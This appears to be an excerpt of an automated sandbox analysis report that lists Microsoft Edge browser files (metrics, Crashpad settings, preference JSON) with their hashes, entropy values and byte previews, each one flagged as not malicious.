                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                                                                MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67CCD620-1FB0.pma

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.03962422561904082
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:AZ0EbtmqvDzKX7iJ8iD12absbZHtgbXVh8IYhHBNELi/cRQMpzjjHn8y08Tcm2Rl:y0EtrlWCchhpQpjjH08T2RGOD
                                                                                                                                                                                                                                                                                                MD5:CF8430CD9B07ECF0E04F6DA69DC457E0
                                                                                                                                                                                                                                                                                                SHA1:517F681A687B2B876B2EE60E61512534B736A285
                                                                                                                                                                                                                                                                                                SHA-256:F248A01C7BBD26B6C60D62FBD57B5CE9AAE9D80BEA0D1D956A7527EA83494286
                                                                                                                                                                                                                                                                                                SHA-512:6B93E15CE8C35211CE7227A0ED33E22BB14176EE2790A68D10DCBC9A928FD2AE02D85851E0070BF53A28E57A2A7647BEDD6237F1E4E4EF8C9A049D9C73E6EA8F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@................a...P..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....e.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".ocfufq20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U.>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z.......................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67CCD620-210.pma

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.44062853621399234
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:jyVcGA0tsGnIDZIxPqJy3TYtOOUPPmogfIYOGrqYWmnmg1HFvTqOW2:3GcGIDZIxqJcKomPfIhGrqsmaHZ1W2
                                                                                                                                                                                                                                                                                                MD5:02C041FB5C013692D0DCE308535553E9
                                                                                                                                                                                                                                                                                                SHA1:5C73B1ABE1EDB920A7840F2E9BB16C6EB8F136F3
                                                                                                                                                                                                                                                                                                SHA-256:00F05470E9F7250929B5E2B4B447D8263BC25248A9D62981BB96C2A5DB2B4303
                                                                                                                                                                                                                                                                                                SHA-512:4E93B2A915599DA3930E987680DFAC57F99FE87DB8979C0688557C7A5B9E7BEE6DD0EE0E85B7AA58C7CF2CAB2F51D3FDA87BAF44053F3ED7F1EDDFA6790E5580
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@...............0...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....i.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".ocfufq20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U?:K..>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered....(..$...

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67CCD633-150.pma

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.04072601971965346
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:EX038ZmqvDtKX7fJEa3XxxTxqZ/g+XG2970R6Eqh57NgGnG1gQMvpR0wn8y08Tcp:w0MZMeK8YZMFhxFCgj3f08T2RGOD
                                                                                                                                                                                                                                                                                                MD5:A508B2B6E4FB900D8E3584041A5AEFD8
                                                                                                                                                                                                                                                                                                SHA1:9FF88F89B9B1525D3124DEB8B92383FDBDDE20D2
                                                                                                                                                                                                                                                                                                SHA-256:7A835D98C55EF9D7B69B42FDA0659225D70513CB66A14C0D97FC0DB0170C53AE
                                                                                                                                                                                                                                                                                                SHA-512:962A5F8279E07D6041944CD0DE4F371BAB26EB7B0136CC105C8C0AB4C8DFA67C8B388D949F8CE1D24C191B1E31FF5CD7ABB6AA1683D04BCAE7C13EED3B7B8B52
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@................b...Q..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".ocfufq20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67CCD63C-1340.pma

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0398474299114742
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:QI038ZmqvD3KX7eDJEa3Xxx7uqZGXPtg34khtbNE3nnI1gQMuBoH7n8y08Tcm2Rl:v0MZdDe18xphlCggiBc08T2RGOD
                                                                                                                                                                                                                                                                                                MD5:B5C52CF6054051529732AAD51DB7ABCF
                                                                                                                                                                                                                                                                                                SHA1:72385BC5DD9D13CBF2307C865E8843BB98FF9764
                                                                                                                                                                                                                                                                                                SHA-256:BF5B825937475B4A27A308B5A522B2C30455747E1902DAA92D1AA0417441B3BA
                                                                                                                                                                                                                                                                                                SHA-512:559F9DDB3BCC25DAF3942E77C8F44FE9B0C019A8758BF57966AB7E33DC3D9EF2E7EB1303EB833D9E2D051FC554D4D4831E53F0B65A02CC53278AD08C99D6B5BD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@................`...O..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".ocfufq20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pma

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3553968406659012
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:biUXhV0xosU8xCe+JKlkQuMRxCb8ZXfgYJ0IJpP0KLsyW1L7Fx6:bFRqxosU8xWMk8xVZ4YWI30otWn
                                                                                                                                                                                                                                                                                                MD5:CFAB81B800EDABACBF6CB61AA78D5258
                                                                                                                                                                                                                                                                                                SHA1:2730D4DA1BE7238D701DC84EB708A064B8D1CF27
                                                                                                                                                                                                                                                                                                SHA-256:452A5479B9A2E03612576C30D30E6F51F51274CD30EF576EA1E71D20C657376F
                                                                                                                                                                                                                                                                                                SHA-512:EC188B0EE4D3DAABC26799B34EE471BEE988BDD7CEB011ED7DF3D4CF26F98932BBBB4B70DC2B7FD4DF9A3981B3CE22F4B5BE4A0DB97514D526E521575EFB2EC6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...@.@...@..............@...................................`... ...i.y.........CrashpadMetrics.....i.y..Yd.h.......A.......e............,.........W.......................W....................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.UsedPct.......h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.........A............................E.[4.f..................E.[4.f.................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.Errors............i.y..Yd.........A..................._..-`....h-.....................h-....................Crashpad.HandlerLifetimeMilestone.......0...i.y.[".........................................i.y..Yd.@.......C...........................VM....],................WM....],................Stability.BrowserExitCodes...... ...i.y......VM....],........H...i.y.1U!S............................................................ ...i.y...0...WM....],........................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.060980776278344
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:FiWWltl/9UgBVP/Sh/JzvLi2RRIxINXj1J1:o1//BVsJDG2Yq
                                                                                                                                                                                                                                                                                                MD5:74B32A83C9311607EB525C6E23854EE0
                                                                                                                                                                                                                                                                                                SHA1:C345A4A3BB52D7CD94EA63B75A424BE7B52CFCD2
                                                                                                                                                                                                                                                                                                SHA-256:06509A7E418D9CCE502E897EAEEE8C6E3DCB1D0622B421DD968AF3916A5BFF90
                                                                                                                                                                                                                                                                                                SHA-512:ADC193A89F0E476E7326B4EA0472814FE6DD0C16FC010AAF7B4CF78567D5DF6A1574C1CE99A63018AFE7E9AD68918147880621A3C00FAA7AD1014A0056B4B9C4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:sdPC......................5.y&.K.?....................................................................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................48ea0ba2-e9bb-4568-92cb-0f42a5c5d505............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\141f681c-a530-4e6a-be25-4763d92d491d.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):14551
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.260600406734927
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:sVpJ9pQTryZiuaba4uypqJj4wwY1Sq327YNND0C8Rpj+FimQwqYOU91f:sVpLAJu4qJcw31HMpU3QwWW
                                                                                                                                                                                                                                                                                                MD5:5506E1F4D4477B3D95F418D8180B9224
                                                                                                                                                                                                                                                                                                SHA1:628CA3DB10C34C60AB7F2BB53C39FC17FE00B8A8
                                                                                                                                                                                                                                                                                                SHA-256:D3D06E6AAACF5F91513AF6B5068BB54BABFA377E054B16E11B951F1F2DC1132A
                                                                                                                                                                                                                                                                                                SHA-512:FD6428B4D14AC4E62BAB5253ECC21887CA154E1B161F0B3CA596F3A946D1BE2FD68BE7A38DADF0F007967F7367AB44D696B3780D725254520210C87E274EF351
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951010462368","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3db54794-aaa0-4325-99d6-b16cae3b474b.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9510
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.947106727321153
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:sVWckdptD2RJ156b9xzwaYCLsd85Th6mp9/x+6M8muec5m1eAeCAe4zvrU2iHQyP:sVhkdpqJj4waYCLC8Rpj+FimQAqU9df
                                                                                                                                                                                                                                                                                                MD5:5B58B774AA294D703013BE6937DE2677
                                                                                                                                                                                                                                                                                                SHA1:B8EB6031D94AEAD3393856100DFDB3104192D604
                                                                                                                                                                                                                                                                                                SHA-256:6A425C879B20CA44DE9C9B60EB4B7E0D80C4D102A29C3E514D231FDE405FB7CA
                                                                                                                                                                                                                                                                                                SHA-512:225F00E6637D933646D1DDA56DC58630CBD9DCBA1217C3305E9B321CB7C3DDC71093E2F840092694A0B52CC51FC96FB87CE15755DF4724573DF61D00FFA25D0C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951010462368","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4e5b6316-6ec4-40d6-8928-f7fb2df3d98b.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):14661
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.258960645516487
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:sVpJ9pQTryZiuaba4uypqJj4wwY1Sq327YNND0C8Rpj+FimQwqjWU91f:sVpLAJu4qJcw31HMpU3QwdW
                                                                                                                                                                                                                                                                                                MD5:35E0729F63925BB5626F75AB204DC020
                                                                                                                                                                                                                                                                                                SHA1:26DD1CEE210390706A0038081B03A1F4FB1A0AB1
                                                                                                                                                                                                                                                                                                SHA-256:C62E274087EF2E26D84357AEFCD50C67BCB4A20429F7994607B4F8DF5A7F51CB
                                                                                                                                                                                                                                                                                                SHA-512:E523564AB623043D0AFCE20129FFEF775338FDCEB0025CBDC706B07BD503AD1366F4A4C2491E69CF27931C7E60AD03E701C469430414164D6195A35270DAFAE1
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951010462368","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\69e6237c-e8ad-452f-b56e-92cac6ce6c10.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):39694
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.562579925058297
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:GUr/1P7pLGLx7pWP0SfvB8F1+UoAYDCx9Tuqh0VfUC9xbog/OVYu5ya33rwcjxDZ:GUr/1Jcx7pWP0SfvBu1jaFu533kcjPnj
                                                                                                                                                                                                                                                                                                MD5:1F2ABA0CBA8CCBA6DD694ECA2F9E6910
                                                                                                                                                                                                                                                                                                SHA1:34F7BC6967FEA19C20DA1BD53A71A3239185870B
                                                                                                                                                                                                                                                                                                SHA-256:2257F7FEBFDE11742D8840798A9299F568A8E44B6A583F75F7D8FD31E914D145
                                                                                                                                                                                                                                                                                                SHA-512:977146B8C54CBE145F0075B8DA4353A0DF63C89557C3DA3A2D7EE0F43384C088D4A9A5CD1071D4666B8696E239569CCE91D3EB636C6FC7313A0DB1F08AE2209E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13385951009736498","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13385951009736498","location":5,"ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8847b890-ea9d-4aa6-815a-c81dc021353f.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):14623
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.25961571833077
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:sVpJ9pQTryZiuaba4uypqJj4wwY1Sq327YNND0C8Rpj+FimQwqYNU91f:sVpLAJu4qJcw31HMpU3QwFW
                                                                                                                                                                                                                                                                                                MD5:3DED68588932D41B02711005017F6ECC
                                                                                                                                                                                                                                                                                                SHA1:828D798463ED8B413D6899420FBC7B0D59CB4E41
                                                                                                                                                                                                                                                                                                SHA-256:69E834A978C4F6217A33CA1D64A06419C65CFC9AD799F41B3E6C3D8D9A852FB4
                                                                                                                                                                                                                                                                                                SHA-512:331366CCD5A2E1FB622D89CC0B682E1CB809C1C84EE91713E85374DDACEF1EBBB5871A39397F142AE116B367F68844A5A5381EF5657238D28D93C2822E21C2AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951010462368","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9665cef4-4a55-41cb-9b60-28998bbd1ecb.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
